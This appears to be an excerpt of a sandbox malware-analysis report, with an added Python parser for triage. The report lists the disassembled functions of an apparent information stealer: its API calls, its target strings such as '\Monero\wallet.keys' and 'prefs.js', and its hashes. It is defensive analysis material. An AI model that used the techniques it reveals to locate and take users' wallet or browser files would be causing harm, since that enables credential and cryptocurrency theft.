                      • Opcode ID: a82d58d367471e793aa7385e9907eef1d1055a23bcc6deca941efa2a6d576bbc
                      • Instruction ID: d18987ebf0c518e2d6e0cb5eee3fc48f2e76285b2b2a656f10fe1eeb66487ab3
                      • Opcode Fuzzy Hash: a82d58d367471e793aa7385e9907eef1d1055a23bcc6deca941efa2a6d576bbc
                      • Instruction Fuzzy Hash: 7E4255B250014CA7CB18FF60DD56DFD73B8AF84300F449578B60AB6195EE74AB49CB92
                      APIs
                      • wsprintfA.USER32 ref: 00EF492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF4943
                      • StrCmpCA.SHLWAPI(?,00F00FDC), ref: 00EF4971
                      • StrCmpCA.SHLWAPI(?,00F00FE0), ref: 00EF4987
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF4B7D
                      • FindClose.KERNEL32(000000FF), ref: 00EF4B92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: fdf57ed8b184f877d5a8025b1525afb05b5981251cf61d78ba888e0e74934cd2
                      • Instruction ID: 7ec375efb67ba399207e4d8489f2a4ead8080fb14898861abe4838f52adc358d
                      • Opcode Fuzzy Hash: fdf57ed8b184f877d5a8025b1525afb05b5981251cf61d78ba888e0e74934cd2
                      • Instruction Fuzzy Hash: C76135B1500219ABCB34EFA0EC45FFA73BCBF88701F004598E619A6185EB71DB959F91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EF4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF4587
                      • wsprintfA.USER32 ref: 00EF45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF45BD
                      • StrCmpCA.SHLWAPI(?,00F00FC4), ref: 00EF45EB
                      • StrCmpCA.SHLWAPI(?,00F00FC8), ref: 00EF4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF468B
                      • FindClose.KERNEL32(000000FF), ref: 00EF46A0
                      • lstrcat.KERNEL32(?,0168E460), ref: 00EF46C5
                      • lstrcat.KERNEL32(?,0168D4A0), ref: 00EF46D8
                      • lstrlen.KERNEL32(?), ref: 00EF46E5
                      • lstrlen.KERNEL32(?), ref: 00EF46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: f77b357efaf514c638021ba2d1a74a08134dff5de260eeddfc10c5d89e3b7d27
                      • Instruction ID: 25d6651ae1f16c4a35b31e08b3ee7a2a3613f5e4da7a5c05ffb609c0616d7e27
                      • Opcode Fuzzy Hash: f77b357efaf514c638021ba2d1a74a08134dff5de260eeddfc10c5d89e3b7d27
                      • Instruction Fuzzy Hash: E25120B150021CABCB34EF70EC89FEA7378AF58301F405598E61AA6184EB759A948F91
                      APIs
                      • wsprintfA.USER32 ref: 00EF3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EF3EDA
                      • StrCmpCA.SHLWAPI(?,00F00FAC), ref: 00EF3F08
                      • StrCmpCA.SHLWAPI(?,00F00FB0), ref: 00EF3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EF406C
                      • FindClose.KERNEL32(000000FF), ref: 00EF4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s
                      • API String ID: 180737720-4073750446
                      • Opcode ID: ce18a4532fecc3476d239d0ee8bc34c42e06a73ddb41f002366156921dbd7d60
                      • Instruction ID: a10601665b0c8c65d72a84dd1fbeed4ae2bf1aab0621b57f1a64b1b07d09aad3
                      • Opcode Fuzzy Hash: ce18a4532fecc3476d239d0ee8bc34c42e06a73ddb41f002366156921dbd7d60
                      • Instruction Fuzzy Hash: 335124B6500218ABCB38EBB0DC45EFA73BCBF44301F404598F759A6084EA75DB958F51
                      APIs
                      • wsprintfA.USER32 ref: 00EEED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 00EEED55
                      • StrCmpCA.SHLWAPI(?,00F01538), ref: 00EEEDAB
                      • StrCmpCA.SHLWAPI(?,00F0153C), ref: 00EEEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEF2AE
                      • FindClose.KERNEL32(000000FF), ref: 00EEF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: ff89ffc42a5eb32673f2e952f5ba17c465f0bf153784a8270df8024af53d942b
                      • Instruction ID: 741b821d6fe368de6c4750fd6e3849d2dfd5629d337a0a1ca2d7a619f5a95351
                      • Opcode Fuzzy Hash: ff89ffc42a5eb32673f2e952f5ba17c465f0bf153784a8270df8024af53d942b
                      • Instruction Fuzzy Hash: 29E120B281115C9ADB18FB20DC55EFE73B8AF94340F4451B9B60A76092EF706B8ACF51
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F015B8,00F00D96), ref: 00EEF71E
                      • StrCmpCA.SHLWAPI(?,00F015BC), ref: 00EEF76F
                      • StrCmpCA.SHLWAPI(?,00F015C0), ref: 00EEF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEFAB1
                      • FindClose.KERNEL32(000000FF), ref: 00EEFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 941f3ef5a3e3eff23b20d33d854727ef2febdd1273ce3df9726800c4a7b3b47c
                      • Instruction ID: ccd4a8acdaa40a61154258579545a6c5f91ea17d32a8d0c5ad9509b92e920b29
                      • Opcode Fuzzy Hash: 941f3ef5a3e3eff23b20d33d854727ef2febdd1273ce3df9726800c4a7b3b47c
                      • Instruction Fuzzy Hash: EDB123B290014C9BCB28FF60DC55AFD73B9AF94300F4491B9E50E6A195EF706B49CB92
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F0510C,?,?,?,00F051B4,?,?,00000000,?,00000000), ref: 00EE1923
                      • StrCmpCA.SHLWAPI(?,00F0525C), ref: 00EE1973
                      • StrCmpCA.SHLWAPI(?,00F05304), ref: 00EE1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EE1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 00EE1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EE1E20
                      • FindClose.KERNEL32(000000FF), ref: 00EE1E32
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 519c5a3fc83999ee492b3ec6757f0dbed5158e408f843e04027f7565e4b2599a
                      • Instruction ID: 2bc5b2b05f7bbea506cffcef6cca63248b1f24653108120016a56eddbf7b846c
                      • Opcode Fuzzy Hash: 519c5a3fc83999ee492b3ec6757f0dbed5158e408f843e04027f7565e4b2599a
                      • Instruction Fuzzy Hash: 561221B291015C9ACB19EB60DC96AFE73B8AF54340F4451B9B20E76091EF706F89CF91
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00F00C2E), ref: 00EEDE5E
                      • StrCmpCA.SHLWAPI(?,00F014C8), ref: 00EEDEAE
                      • StrCmpCA.SHLWAPI(?,00F014CC), ref: 00EEDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEE3E0
                      • FindClose.KERNEL32(000000FF), ref: 00EEE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: 465e4df6fd695d6d9358bf014227ded711fefeb84cfdbc0173842924db96025c
                      • Instruction ID: 864567e85e8db20b60a524e9b8301c00ef95b052f1d4dac468fefd148491c67d
                      • Opcode Fuzzy Hash: 465e4df6fd695d6d9358bf014227ded711fefeb84cfdbc0173842924db96025c
                      • Instruction Fuzzy Hash: 3DF1DEB281015C9ACB29EB60DC95EFE73B8BF54340F8451B9A60E76091EF706B89CF51
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00F014B0,00F00C2A), ref: 00EEDAEB
                      • StrCmpCA.SHLWAPI(?,00F014B4), ref: 00EEDB33
                      • StrCmpCA.SHLWAPI(?,00F014B8), ref: 00EEDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEDDCC
                      • FindClose.KERNEL32(000000FF), ref: 00EEDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: 7e673f6544a748ae8260e9c2d888d2f717a85b7caabea5932e01420a6a6abd9e
                      • Instruction ID: daac445cc4df5d497c86d752db306d9e1cc43d6a1789d654a6e66ba3555ed275
                      • Opcode Fuzzy Hash: 7e673f6544a748ae8260e9c2d888d2f717a85b7caabea5932e01420a6a6abd9e
                      • Instruction Fuzzy Hash: BA9156B290010C97CB14FF70EC569FD73BD6B84340F049578F91AAA185EE74AB598B92
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,00F005AF), ref: 00EF7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EF7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00EF7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EF7C62
                      • LocalFree.KERNEL32(00000000), ref: 00EF7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: 1d3a1fdaa73c461b99ac5848587fa6876413bba0502e1bf50db13d58a86c224e
                      • Instruction ID: 2728a14f65927607d8df49cceb7d3739e3b28e3b5e516a448bf6969e53ab355f
                      • Opcode Fuzzy Hash: 1d3a1fdaa73c461b99ac5848587fa6876413bba0502e1bf50db13d58a86c224e
                      • Instruction Fuzzy Hash: 2541F7B194021CABDB24DF94DC99BFEB7B4EF48700F2041A9E60976181DB746B85CFA1
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F00D73), ref: 00EEE4A2
                      • StrCmpCA.SHLWAPI(?,00F014F8), ref: 00EEE4F2
                      • StrCmpCA.SHLWAPI(?,00F014FC), ref: 00EEE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: 402c182016b60f3bb48aa4ed5e7e4eede5071588d86e8cab724457c9e265714e
                      • Instruction ID: a8dbc1878b1c25e59dc617650c02a3ad35ee4db4a4f9e480547a680c6ba3fcaa
                      • Opcode Fuzzy Hash: 402c182016b60f3bb48aa4ed5e7e4eede5071588d86e8cab724457c9e265714e
                      • Instruction Fuzzy Hash: 021231B290011C9ADB18FB60DC56EFD73B8AF94340F4451B9B60E7A095EF706B49CB92
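The API listings in these function entries share one line grammar: `Name.MODULE(args), ref: address`, with a `Part of subcall function X:` prefix on calls made one level down, `?` for arguments the analyser could not resolve, eight hex digits for DWORD values and everything else a resolved string (here `\*.*` and `\Monero\wallet.keys`). Parsing that grammar lets the API mix and the resolved strings be pulled out of a report mechanically instead of by reading. The Python below is an added example for that, not code from Joe Sandbox or from the sample: the line format is taken from the report, the behaviour map is a heuristic of my own that also covers the Toolhelp32 and CryptoAPI functions listed further down, and the SAMPLE text copies the FindFirstFileA entry above plus one `wsprintfA` line (from the GetLocalTime function below) to exercise the no-argument form.

```python
"""Parse Joe Sandbox "APIs" call listings into structured records.

Added triage helper; the line format comes from the report, the behaviour map
is a heuristic, and SAMPLE copies lines from the report for demonstration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?"          # wsprintfA.USER32 has no argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class Call:
    api: str
    module: str
    ref: int                          # address of the call instruction
    args: list
    subcall_of: Optional[int] = None  # function that actually makes the call

    @property
    def literals(self) -> list:
        """Arguments Joe Sandbox resolved to strings (neither '?' nor a DWORD)."""
        return [a for a in self.args if a != "?" and not HEX_RE.match(a)]


def parse_api_listing(text: str) -> list[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                  # section headers such as "APIs" / "Strings"
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), int(m.group("ref"), 16),
                          args, int(sub, 16) if sub else None))
    return calls


# Heuristic: a behaviour is reported when every API in its set was called.
BEHAVIOURS = {
    "directory enumeration": {"FindFirstFileA", "FindNextFileA"},
    "process enumeration": {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"},
    "DPAPI decryption": {"CryptUnprotectData"},
    "CryptoAPI string decoding": {"CryptStringToBinaryA"},
    "CryptoAPI string encoding": {"CryptBinaryToStringA"},
}


def summarize(calls: list[Call]) -> dict:
    apis = {c.api for c in calls}
    return {
        "apis": sorted(apis),
        "direct": [c.api for c in calls if c.subcall_of is None],
        "strings": sorted({s for c in calls for s in c.literals}),
        "behaviours": sorted(t for t, need in BEHAVIOURS.items() if need <= apis),
    }


# Copied from the report: the FindFirstFileA entry plus one no-argument line.
SAMPLE = r"""
APIs
  • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
  • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00F00D73), ref: 00EEE4A2
  • StrCmpCA.SHLWAPI(?,00F014F8), ref: 00EEE4F2
  • StrCmpCA.SHLWAPI(?,00F014FC), ref: 00EEE508
  • FindNextFileA.KERNEL32(000000FF,?), ref: 00EEEBDF
  • wsprintfA.USER32 ref: 00EF79F3
"""

if __name__ == "__main__":
    for key, value in summarize(parse_api_listing(SAMPLE)).items():
        print(f"{key}: {value}")
```

Feeding a whole report's "APIs" sections through `parse_api_listing` and grouping by the `ref` addresses gives a per-function view of resolved strings, which is where paths such as `\Monero\wallet.keys` surface without scrolling through the dump metadata.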
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #n$-DZw$a;}$zB??$bzg$o~
                      • API String ID: 0-2225315989
                      • Opcode ID: 804319117b9e0cda65ddc5009827439b3730d84874c71ae88b7a8ffea8148b5b
                      • Instruction ID: 962c63a9272aa229cb3dddcbd1cad2adafd1317cffba173b3a80741132bc954e
                      • Opcode Fuzzy Hash: 804319117b9e0cda65ddc5009827439b3730d84874c71ae88b7a8ffea8148b5b
                      • Instruction Fuzzy Hash: CBB247F36082049FE304AE2DEC8567ABBE9EFD4720F1A493DE6C5C3744EA3558058657
                      APIs
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9AEF
                      • LocalAlloc.KERNEL32(00000040,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B01
                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EE9B2A
                      • LocalFree.KERNEL32(?,?,?,?,00EE4EEE,00000000,?), ref: 00EE9B3F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptLocalString$AllocFree
                      • String ID: N
                      • API String ID: 4291131564-1689755984
                      • Opcode ID: 6b775d421786262bb8b4768727c020266b3d198b5c1a1a19c6dc0aeae2944dd0
                      • Instruction ID: 9e31470497484cb88ee542170108aafb922d68a6a7cdba5ce079bed844f73ad8
                      • Opcode Fuzzy Hash: 6b775d421786262bb8b4768727c020266b3d198b5c1a1a19c6dc0aeae2944dd0
                      • Instruction Fuzzy Hash: 5311D2B4240208BFEB24CF64D895FAA77B5FB89705F208058FA159B384C7B2A941CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
